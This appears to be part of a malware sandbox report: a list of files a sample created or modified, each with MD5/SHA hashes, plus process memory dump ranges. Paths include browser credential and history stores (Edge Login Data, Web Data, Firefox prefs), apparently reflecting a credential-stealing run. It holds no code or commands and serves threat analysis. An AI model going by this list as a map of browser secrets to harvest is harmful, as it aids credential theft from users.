C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\9.log

MD5 2cbbb74b7da1f720b48ed31085cbd5b8
SHA1 79caa9a3ea8abe1b9c4326c3633da64a5f724964
SHA256 e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3
SHA512 ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

memory/3032-15-0x0000000000BA0000-0x0000000000BAC000-memory.dmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\dpu1uz4v.default-release\activity-stream.discovery_stream.json.tmp

MD5 b2f3cdc6cd001f395d46883b3376404c
SHA1 d6299007363c312896e475255ab06659a66ef71a
SHA256 4f4131817d651a08f82976aabae1e4183cf008ec264e1b967d06a28f5419c4be
SHA512 c4b2c8863ac385466239ba44d9b0028d29d60ceb70329bdacb8348a29457f0e1b4053a8a454e9e3055cf266902f7ec810cea63b409471783168b5efa615f091a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dpu1uz4v.default-release\prefs.js

MD5 970a4d439a4f4c2219660e23c4ee884b
SHA1 44ffb963754779e444ca1f5d9dda465fc73a7a6a
SHA256 144f903f08ab6834b5e1862140c2fa683bc5d4794bd715233c24122856cd6e87
SHA512 00028bea4c4f5d6241d1c39c088b75239449919e7b7c925c7fcdda194a6bf5a90dd6369680374b53ba0f88342dd285ee3dc2cd34fb747386626517d87adfb4c7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dpu1uz4v.default-release\sessionstore-backups\recovery.jsonlz4

MD5 519fc299c4f8780c149ef87f4a81f765
SHA1 64ca477882941cc33e2f9fd81c43a6ba997f92d2
SHA256 e75e95431eba44675b2af64215a05edea8e852eb1974a09a6d4467c7f46c050c
SHA512 b1f74462bf7b0141cfc6a211de0fd145d52ef9e3c707c9b9a1e49621dc54b9bc7317e4cb5ce0b59cd1b3c6f3d170a7a773c1058a0a88961fb50703341561823e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dpu1uz4v.default-release\prefs.js

MD5 c1b1c1fa4cfbc39137538b103b46ccb5
SHA1 43c466c046613ae9074a96a0c501be3dc57e3d66
SHA256 659049b6f472f54e26560e743f8f7b18431db84a9a922f278c0f2a1459d536b6
SHA512 ace286159de010be88c286c6af6907d5bad300a74687d9ff4b59db783ac8cf67bfb7fc2721130e8ba3ec168d56c1fecd240007c33d249a8c638b235c5764515e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dpu1uz4v.default-release\prefs-1.js

MD5 5b7ecca2f144edc8846a88e997e4e497
SHA1 3cce491e842d3034a39a5308c689dcd62b4c549a
SHA256 986807e5934d784d3ec702e4d95b9e0f311f56ee822d9219961c9b91a9b8cb09
SHA512 cd943ff6e28721f24c7963c33ff3b7e86a953a0a26c89add5f750fb0cf115ab3ebd8c872465eeb53ccd35a4e3cb7f844c809bfcb39203733c22dd3bd833aa5d4

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 85430baed3398695717b0263807cf97c
SHA1 fffbee923cea216f50fce5d54219a188a5100f41
SHA256 a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA512 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dpu1uz4v.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

MD5 3d33cdc0b3d281e67dd52e14435dd04f
SHA1 4db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256 f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512 a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dpu1uz4v.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

MD5 fe3355639648c417e8307c6d051e3e37
SHA1 f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA256 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA512 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\dpu1uz4v.default-release\cache2\entries\F4EFE37A30D0F14C6AC03FF7949A51CBC2EBC649

MD5 9b875dc28dbf03f820a7dcfd6867ab13
SHA1 b8c2c55fce4958c95c97f263bcd518de2c431ea5
SHA256 b75566c774f623e7f9b01c5b192120f4dbfddab10019e8833afb722bc2133804
SHA512 ca7f550122ad91da0c5713059a49f8403412a58b7b22efd7436f214cacd0bd7174edc26900358c84fd17073f82df7cf59b6df32e03feb02d7aeaf189d4d8f4fe

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dpu1uz4v.default-release\prefs-1.js

MD5 b1f3cc84f8f90a559ef3a2e523325221
SHA1 8945fb59baa3b523fe4a8ee254c408256a7e6d39
SHA256 c5e7547e4c9c9ede390b3b18b8238d6819a717af852eb26836239a174639d021
SHA512 1d2b9f1c31dd1d376b6b97ebbf61734c0753169167abbe9a72764ff325d7e2e34704090bd71b313e2999662bad17c323f56dd4a48f421caeddb756dd1e575a01

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 a01c5ecd6108350ae23d2cddf0e77c17
SHA1 c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512 b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dpu1uz4v.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

MD5 49ddb419d96dceb9069018535fb2e2fc
SHA1 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA256 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA512 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dpu1uz4v.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

MD5 33bf7b0439480effb9fb212efce87b13
SHA1 cee50f2745edc6dc291887b6075ca64d716f495a
SHA256 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512 d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dpu1uz4v.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

MD5 688bed3676d2104e7f17ae1cd2c59404
SHA1 952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA256 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA512 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dpu1uz4v.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

MD5 937326fead5fd401f6cca9118bd9ade9
SHA1 4526a57d4ae14ed29b37632c72aef3c408189d91
SHA256 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512 b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dpu1uz4v.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

MD5 8be33af717bb1b67fbd61c3f4b807e9e
SHA1 7cf17656d174d951957ff36810e874a134dd49e0
SHA256 e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA512 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

memory/3032-833-0x000000001C670000-0x000000001C82A000-memory.dmp

memory/3032-2068-0x00000000009C0000-0x00000000009CE000-memory.dmp

memory/3032-2088-0x00000000009D0000-0x00000000009E6000-memory.dmp

memory/3708-2089-0x0000000000400000-0x0000000000410000-memory.dmp

memory/3708-2090-0x0000000005A80000-0x0000000005B12000-memory.dmp

memory/3708-2091-0x0000000005B20000-0x0000000005BBC000-memory.dmp

memory/3708-2092-0x0000000006170000-0x0000000006716000-memory.dmp

memory/3708-2093-0x0000000005D60000-0x0000000005DC6000-memory.dmp

memory/1100-2094-0x0000000004610000-0x0000000004646000-memory.dmp

memory/1100-2095-0x0000000004C80000-0x00000000052AA000-memory.dmp

memory/1100-2096-0x0000000004BF0000-0x0000000004C12000-memory.dmp

memory/1100-2097-0x00000000053A0000-0x0000000005406000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bgbkinz1.fj5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1100-2106-0x0000000005580000-0x00000000058D7000-memory.dmp

memory/1100-2108-0x0000000005A80000-0x0000000005ACC000-memory.dmp

memory/1100-2107-0x0000000005A50000-0x0000000005A6E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 5b74da6778ccaa0e1ca4ae7484775943
SHA1 0a2f6f315a0ca1a0366b509aec7b13c606645654
SHA256 172282931d7eeb60228e6b9b4b913fd78c73f2a7855620f35fb24a5c847b6c78
SHA512 20b4cb7174f49b22426b249f1dfc8f6273f50d1502536e773f4dcd073bf027f2a554d2437c2dc628dbe021c5c3b968b2d89f810ff1bb19630c1560e7feee1a1a

memory/2120-2122-0x0000000005AA0000-0x0000000005DF7000-memory.dmp

memory/2120-2131-0x0000000006F40000-0x0000000006F86000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dpu1uz4v.default-release\prefs.js

MD5 8c286072bdc12d5b2ef516b669033150
SHA1 2bca51c6cc24672a99d19d2e28922ca6ddbbea83
SHA256 da649695fc8e6d67d1adcb201a16b8058d04c3316ca287b5228446881cc81b67
SHA512 b4bfa70323110adcb414f1a9a63211ffeca04c0510a8e9773443d205348691d188c76c085b94b9c2ecb786529c2404c3529f4d42d81684a470b053b7f3890900

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

MD5 37e31de9d56b85885ed9616db5001472
SHA1 d3edf500593e13ade5b5e12444890250375cbd3d
SHA256 e10c85cd0e58ec560bdd1e7af12d850c301dbe426aaf99b621af9f643477f6a4
SHA512 f55bf8942764f44de537fe18ac7ea5057217bbab242b2dc8631784438f4cc6d457b403709feb8d0e424deacb07b1b73d51f6ce9fedeb5de3996dcc2a066f76d8

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\shared_proto_db\metadata\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\shared_proto_db\metadata\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\CrashpadMetrics-active.pma

MD5 c0dc0b433428a2329ffc182b2ed66527
SHA1 aca88da486b0cacbf1d9084fc7dfa819eca835f2
SHA256 d46d305170477e13210f79626974f1276f823ba5471663c4fecd206fb0da3cac
SHA512 731836b0482e0deb1d28779c3689245c4de87673fea8a34080891eac08851a08edaba824f6853f09244a6558930309dfefdfd8fd5d6131c0786947970290fe4e

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\throttle_store.dat

MD5 9e4e94633b73f4a7680240a0ffd6cd2c
SHA1 e68e02453ce22736169a56fdb59043d33668368f
SHA256 41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304
SHA512 193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

MD5 0c705388d79c00418e5c1751159353e3
SHA1 aaeafebce5483626ef82813d286511c1f353f861
SHA256 697bd270be634688c48210bee7c5111d7897fd71a6af0bbb2141cefd2f8e4a4d
SHA512 c1614e79650ab9822c4e175ba528ea4efadc7a6313204e4e69b4a9bd06327fb92f56fba95f2595885b1604ca8d8f6b282ab542988995c674d89901da2bc4186f

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Local State

MD5 aee2e6c760d01c955745173f88a857de
SHA1 e0b01bed15d899dc0938188f59df012d538fa195
SHA256 89941fa9fbd4c108b62774998ed0fe591d4879e262892d07002d4c55bff61bc8
SHA512 c1e4ae0735a6de20d11b9e75aecc5ce9cb6b15b5bbd9ace1abe839e5ff5b571b029c67f2b49bbfafea10123095c8fed702e5d55cd2c821f1d237fbedf4cd5752

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Secure Preferences

MD5 b77f1df7c125fdc7761f1071577634d8
SHA1 7e2ef9a60627018632d2ef081e9e646c6b207873
SHA256 7d46bf082a9b62e26c20316a7627e6f856a50503c5c453e4151e49df3176d784
SHA512 fdb7abdf8efcd5e45b047554b8a5ca603ed5a88757c3adaa4f76d07de56a86020590cb03c64b8be3f2744aeb908a38152b8474a0cc2005fe65fb8340e9499177

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Login Data

MD5 14ccc9293153deacbb9a20ee8f6ff1b7
SHA1 46b4d7b004ff4f1f40ad9f107fe7c7e3abc9a9f3
SHA256 3195ce0f7aa2eae2b21c447f264e2bd4e1dc5208353ac72d964a750de9a83511
SHA512 916f2178be05dc329461d2739271972238b22052b5935883da31e6c98d2697bd2435c9f6a2d1fcafb4811a1d867c761055532669aac2ea1a3a78c346cdeba765

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\load_statistics.db

MD5 6780bb4df66c6818a25a12aa32e23064
SHA1 4c87f2128aa3399c1e214277dba94e4f1d43c4f8
SHA256 cd3de98fd555f2e470e099c24e97e228f28851cb147557eb24ec1b95135e859e
SHA512 d13d2d1d9be182cf7122a9cef7872ce3e9f864bdbcf1d275bd73161a16b3eb8d8c4cb82fe52feb9e77ce398094e075c44a129670d376d980d3a59af313053da7

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\index

MD5 3a2c6e15d36572123da116e7fe5bf32a
SHA1 03c5ac9c6eb8849cba37d4c850682ab61464449b
SHA256 89a31b7620c2f4375972d6e25a6bac341fed2ac1a563a693fdc54499377632c9
SHA512 71524b1f94270fa31cf89dcdc0b3fc18587254e863e48688c54b4732e8bc792b1b2ddbd409c12860de0dbe9e131556bff7ff4ebc97cf4974d29cee8b66ec701b

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Preferences

MD5 e2a256139defc445493525acdadecb3e
SHA1 bed4ebcc9909a7c80f2da3fb311ce579bfddc1ca
SHA256 947f3640590eb15f2327e7db252eb898110421e55df0c442d28275c11ad56232
SHA512 9041484f3738d708f1d73c2f23fbb136f5b2e85dfda401ad44805ddec873852c1429d1e054ae68e2436cc0e18ba69059a567ef00b8e5a94ea74c43ad711990fc

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\shared_proto_db\LOG

MD5 06b72861206e8aed1b32effc041378c6
SHA1 9207a3d3d9c5228ee8d1b3ae25ab42f2e48972cf
SHA256 d901492f4ab1d98087d265256304b08ece9983834d2f3909489f08d73fb1c018
SHA512 ee553bf3166499f8cec7f7f9ecce64005e97bed51732f296d184eb1057022094e00300f81e385003a76ff6a1c5e5aa434b0c170a93adc72aae455d903ebbaa3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\shared_proto_db\metadata\000003.log

MD5 e4ed5231afe51e01740db96825edcc1b
SHA1 630576047360a2f23417996d8d677a52ba2e4961
SHA256 ca261950cfc5c0c0269855e1c7c356e4e3dbb6851c836eb5888545c3c92e5ed2
SHA512 902a7fd0dc6688dc9b6f3ea7b06748c5bb22901edb299782adf819b66d79dc0ef99d3af459461811231ff2b1024e542935fed319376d21298d5b0fb207266bdc

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\shared_proto_db\metadata\LOG

MD5 6029695c76c80b3ecbfce4f9c08dcd5b
SHA1 d3571eb0910dae5dbe4bace4346c8395d8dbe459
SHA256 5a027a8278ac8858228141c57950f9e898568c1dff42a0fc3b974380e9bf4221
SHA512 5b04674d8146edf6154c7aa45d8e235b3b3cd1e22552a8a1b2f873306a1fa5eb0f16a484830d5b5c1ba5608cf6892d927c2c20852bbac8486d148f21ec97a0f5

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Code Cache\wasm\index-dir\the-real-index

MD5 6e0aa0ced1ca0a8be1e8fa7b6dcf737a
SHA1 414b35d48c16262e0aadd6ad5bce2798513fc487
SHA256 a1d51df62088bea3ad8db7bc59d63cb3ecceab53c01954891a17d6df2a5e530c
SHA512 2120e87bd8306a0a0328dead07e07602183e67040fdb9da15ec7d39eb394a7ca95c40c3ca5657a4b1b994b50f527600efcf02dea8206d5d0203ecfc870bc9f7a

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Local Storage\leveldb\LOG

MD5 83192002ab9ea9154793594f9ecfe689
SHA1 e1e5428a043abe787b4ff38b4ba154d80dfa812d
SHA256 4de42a7d5fb8ea1a3fb4458a5819a344e71c0a53a5aea5e3703ee21ff08708d4
SHA512 de14b0bc3957219ba4d8e6d640bec77be436d2874f3ff70490a7d69a6dafd2018ef567d29ef43d98bba54c52f62b9196b83d2218d6b65a7da5135412fdeb1d70

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Local Storage\leveldb\LOG.old

MD5 7111d89f55958cb146c66e36824c8a68
SHA1 d0a625831151415994cc9e95c8471a6724e52264
SHA256 e74c07a448772ae5d8030c6f1550214a736554016f9f0f1f8d77a9c72fbe7afe
SHA512 e989ceac045709f95f3842a29489676b34f314a297cda77d18f9e105bc9ead2fe5c6db84827b3efe8fe59f33345c5c5e2a11c0b7ed220cfe8b9a85a880907f8d

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Top Sites

MD5 325ddf165383376a8e530a8288a9fb73
SHA1 f451204bb6f3de9de42f27bd887576b083026e87
SHA256 53eb4fcb3cbcaacd4d94036c9379715990f86185b8ef7fd18cb27665193da6c8
SHA512 edb9c49956741560f40df102b81c3b558b1ae9ce902040f89cecb2fbbf60277dcb73f68d8b7c60340a92c46915828b7a204420292d0a4906ac0e9082943ad528

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

MD5 0d84d1490aa9f725b68407eab8f0030e
SHA1 83964574467b7422e160af34ef024d1821d6d1c3
SHA256 40c09bb0248add089873d1117aadefb46c1b4e23241ba4621f707312de9c829e
SHA512 f84552335ff96b5b4841ec26e222c24af79b6d0271d27ad05a9dfcee254a7b9e9019e7fac0def1245a74754fae81f7126499bf1001615073284052aaa949fa00

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\History Provider Cache

MD5 a9851aa4c3c8af2d1bd8834201b2ba51
SHA1 fa95986f7ebfac4aab3b261d3ed0a21b142e91fc
SHA256 e708be5e34097c8b4b6ecb50ead7705843d0dc4b0779b95ef57073d80f36c191
SHA512 41a1b4d650ff55b164f3db02c8440f044c4ec31d8ddbbbf56195d4e27473c6b1379dfad3581e16429650e2364791f5c19aae723efc11986bb986ef262538b818

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Web Data

MD5 87210e9e528a4ddb09c6b671937c79c6
SHA1 3c75314714619f5b55e25769e0985d497f0062f2
SHA256 eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1
SHA512 f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Sessions\Tabs_13359654762193490

MD5 e306cd4fad64a2490a849e8f3ee54c6c
SHA1 9e363627ab46c8804406c708d935e93eeb92284c
SHA256 2afdd10eb02b6b62ce7291b85afd0eba2f4a1ca40ee76adb11453cf5560a071b
SHA512 e58a3fb48ea0953e33398fc78d4dbaf7efa39f5b8127e916faadf51ba7c5df84b1051f677ba39237425e4ae0e984b37e5fc8212f350af877af27a2c4fb7e0a73

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Site Characteristics Database\000003.log

MD5 148079685e25097536785f4536af014b
SHA1 c5ff5b1b69487a9dd4d244d11bbafa91708c1a41
SHA256 f096bc366a931fba656bdcd77b24af15a5f29fc53281a727c79f82c608ecfab8
SHA512 c2556034ea51abfbc172eb62ff11f5ac45c317f84f39d4b9e3ddbd0190da6ef7fa03fe63631b97ab806430442974a07f8e81b5f7dc52d9f2fcdc669adca8d91f

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Site Characteristics Database\LOG

MD5 008c4bae7c061106471f952c132114c4
SHA1 19c9bb2cdfc82e31b6ded04005408779e3754854
SHA256 58d3ec1e87fe7b0d38128b0e460957d015d6e0100c297791f8b54d79c0b42149
SHA512 365652915e99ff256bd6b0d5bd10bfbee8195c2bd7d5845d97463449fd142a25b5ead05079300b0844270c6d41efe0b0288a2308e94ee2dd224111242a763200

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Media History

MD5 cf7ac318453f6b64b6dc186489ff4593
SHA1 b405c8e0737be8e16a08556757dc817bd02af025
SHA256 634434e865f1ba1b90039bd5afd8f01bad6d278377106022ea2a9c2d8778d31a
SHA512 b64e484d16222d8de31f53cd60b719b7d855bbc552a7d052e202382bc3013e0edaceb31e3a287f2ea6b7117ccfdb8a56ea9d7da78535d2c606183072ecd084e4

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Site Characteristics Database\LOG.old

MD5 f2283e1ecc3aec71459b92fc4cf32162
SHA1 0b525e149242255695089ab1e1cb93b7b4e4acef
SHA256 441ad78b4dc1e530fae8d672703d8ac37701dcc4a68e7ea083618802344fe3ae
SHA512 61b4adac081d52972bb5ec8b646628b7260fd39cedb8a4e33aecdb52cf4d4be61eea43170bdc13bf739ac515f3787e66d80338294f0cc09b6cc15a0451b745d0

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Sync Data\LevelDB\000003.log

MD5 90881c9c26f29fca29815a08ba858544
SHA1 06fee974987b91d82c2839a4bb12991fa99e1bdd
SHA256 a2ca52e34b6138624ac2dd20349cde28482143b837db40a7f0fbda023077c26a
SHA512 15f7f8197b4fc46c4c5c2570fb1f6dd73cb125f9ee53dfa67f5a0d944543c5347bdab5cce95e91dd6c948c9023e23c7f9d76cff990e623178c92f8d49150a625

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Sync Data\LevelDB\LOG

MD5 6590a580eb950dc2d02a7792f5ba199c
SHA1 0c83e835967d98bd6bcc61aa7169ee80a130e8ad
SHA256 379dcbbcc62e33507e84b383f445068a97875794724daca21a9e1e97da45fa20
SHA512 e855ad17c3aaca65f555e65cd9999ee6d0f098eac90b866729be65ca2194230b7ba9d07e0e96a72c86f9e0f541fa903b18737e9593be066c12f5a74dd2a01f33

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Sync Data\LevelDB\LOG.old

MD5 162615d0ad580a1f174bd445d4a2ca9f
SHA1 6b42d5486f52e8c702cf5629972d9338914fa636
SHA256 01d7a955ffe70ea1094d47d7e91446dc9de9696aa6613731dd461815a6bf4399
SHA512 390e5ccfc4853c2fdef681211c652a323c0e1e838c6b588104464157b2adca6ab68ab861175991bb6e4079764494d7cf0077d9acc754a958892c97e009bdbd85

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Code Cache\wasm\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Visited Links

MD5 41c0ccaccd60576dd2f2fe50a03c91ff
SHA1 91e6481b73a725daeada5ed69e624fd8105e1eea
SHA256 90ae3663985e52bf782ebf72b1ea1f0cc140d7710df5bf8f4bec9a1a48661acc
SHA512 45beb46eaed489e2de1358748c92049dd9c478440315226d9df45b3744f5c5308a95a9fb39e5f14529982807da77877ca103bba176f2d2b7db3d1fee21c741ae

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Favicons

MD5 5688ce73407154729a65e71e4123ab21
SHA1 9a2bb4125d44f996af3ed51a71ee6f8ecd296bd7
SHA256 be1b822e970dfe1a120d248db7000eaf799bd6531929a1308676c70fe1608d60
SHA512 eb6452b23ea36c39d03ead154185616c13583f12f382cb2456beeb1ba6e5febdfd2a6f1064283cf115ad1c517dbf409777cdacb128e00c9d3f401335db355537

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\History

MD5 4e2922249bf476fb3067795f2fa5e794
SHA1 d2db6b2759d9e650ae031eb62247d457ccaa57d2
